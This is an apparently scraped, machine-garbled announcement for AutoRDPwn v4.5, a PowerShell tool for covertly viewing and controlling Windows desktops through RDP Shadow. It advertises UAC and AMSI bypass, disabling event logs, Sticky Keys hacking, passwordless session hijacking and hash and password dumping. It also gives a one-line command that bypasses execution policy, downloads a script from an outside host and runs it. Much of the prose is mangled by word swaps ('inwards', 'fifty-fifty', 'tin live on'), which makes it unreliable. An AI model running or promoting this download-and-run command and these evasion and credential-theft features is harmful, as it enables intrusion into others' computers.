Autordpwn V4.5 - The Shadow Assail Framework
AutoRDPwn is a script created inwards Powershell as well as designed to automate the Shadow assault on Microsoft Windows computers. This vulnerability allows a remote aggressor to stance his victim's desktop without his consent, as well as fifty-fifty command it on request. For its right operation, it is necessary to comply alongside the requirements described inwards the user guide.
Requirements
Powershell 5.0 or higher
Changes
Version 4.5
• New ninja agency icon!
• Automatic cleaning of Powershell history afterward execution
• Now all dependencies are downloaded from the same repository
• Many errors as well as bugs fixed
• UAC & AMSI bypass inwards 64-bit systems
• New module available: Remote Desktop Caching
• New module available: Disable arrangement logs (Invoke-Phant0m)
• New module available: Sticky Keys Hacking
• New available module: Remote Desktop History
• New available attack: Session Hijacking (passwordless)
WARNING! This assault is real intrusive as well as tin solely live on used locally
*The residual of the changes tin live on consulted inwards the CHANGELOG file
Use
This application tin live on used locally, remotely or to pin betwixt computers. Thanks to the additional modules, it is possible to dump hashes as well as passwords or fifty-fifty recover the history of RDP connections.
One draw of piece of occupation execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
The detailed direct of purpose tin live on establish at the next link:
https://darkbyte.net/autordpwn-la-guia-definitiva
Screenshots
Credits as well as Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m
Contact
This software does non offering whatever variety of guarantee. Its purpose is exclusive for educational environments as well as / or safety audits alongside the corresponding consent of the client. I am non responsible for its misuse or for whatever possible harm caused past times it.
For to a greater extent than information, y'all tin contact through info@darkbyte.net
